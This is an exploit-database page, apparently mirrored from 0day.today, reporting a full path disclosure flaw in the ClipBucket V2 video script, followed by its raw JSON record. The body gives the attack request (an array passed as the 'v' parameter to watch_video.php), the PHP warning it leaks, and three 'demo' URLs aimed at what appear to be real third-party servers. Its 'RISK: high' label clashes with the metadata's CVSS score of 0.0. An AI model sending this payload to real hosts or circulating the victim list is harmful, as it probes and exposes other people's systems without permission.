Search...

ClipBucket V2 full path disclosure Vulnerability

2013-01-14T00:00:00

ID 1337DAY-ID-20179
Type zdt
Reporter Angel Injection
Modified 2013-01-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] ClipBucket V2 full path disclosure Vulnerability
[-] Found by Angel Injection
[-] Version: 2
[-] Security -::RISK: high
[-] platforms: php
[-] Download Link: http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/

exploit

https://localhost/[path]/watch_video.php?v[]=facbabd8f88ef7d add []

Warning: stripslashes() expects parameter 1 to be string, array given in /var/www/tube/includes/functions.php on line 58

demo
http://86.111.145.28/tube/watch_video.php?v[]=facbabd8f88ef7d
http://mycompaq.dyndns.org/video/watch_video.php?v[]=18223b696909b07
http://86.111.144.147/tube/watch_video.php?v[]=cf4b8d2159e9c1b

#  0day.today [2018-04-11]  #

JSON Vulners Source

Initial Source

{"published": "2013-01-14T00:00:00", "id": "1337DAY-ID-20179", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-04-11T19:47:10", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/GOPHER/GOPHER_GOPHERMAP", "MSF:AUXILIARY/SCANNER/HTTP/WP_NEXTGEN_GALLEY_FILE_READ", "MSF:AUXILIARY/SCANNER/UBIQUITI/UBIQUITI_DISCOVER", "MSF:AUXILIARY/SCANNER/RSYNC/MODULES_LIST", "MSF:AUXILIARY/SCANNER/REDIS/REDIS_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/HTTPDASM_DIRECTORY_TRAVERSAL", "MSF:AUXILIARY/SCANNER/HTTP/DICOOGLE_TRAVERSAL", "MSF:AUXILIARY/SCANNER/HTTP/GIT_SCANNER", "MSF:AUXILIARY/SCANNER/SSH/SSH_IDENTIFY_PUBKEYS", "MSF:AUXILIARY/SCANNER/RDP/RDP_SCANNER"]}], "modified": "2018-04-11T19:47:10", "rev": 2}, "vulnersScore": -0.2}, "type": "zdt", "lastseen": "2018-04-11T19:47:10", "edition": 2, "title": "ClipBucket V2 full path disclosure Vulnerability", "href": "https://0day.today/exploit/description/20179", "modified": "2013-01-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": [], "sourceHref": "https://0day.today/exploit/20179", "references": [], "reporter": "Angel Injection", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm Angel Injection member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n[+] ClipBucket V2 full path disclosure Vulnerability\r\n[-] Found by Angel Injection\r\n[-] Version: 2\r\n[-] Security -::RISK: high\r\n[-] platforms: php\r\n[-] Download Link: http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/\r\n\r\nexploit\r\n\r\nhttps://localhost/[path]/watch_video.php?v[]=facbabd8f88ef7d add []\r\n\r\nWarning: stripslashes() expects parameter 1 to be string, array given in /var/www/tube/includes/functions.php on line 58\r\n\r\ndemo\r\nhttp://86.111.145.28/tube/watch_video.php?v[]=facbabd8f88ef7d\r\nhttp://mycompaq.dyndns.org/video/watch_video.php?v[]=18223b696909b07\r\nhttp://86.111.144.147/tube/watch_video.php?v[]=cf4b8d2159e9c1b\n\n# 0day.today [2018-04-11] #", "immutableFields": []}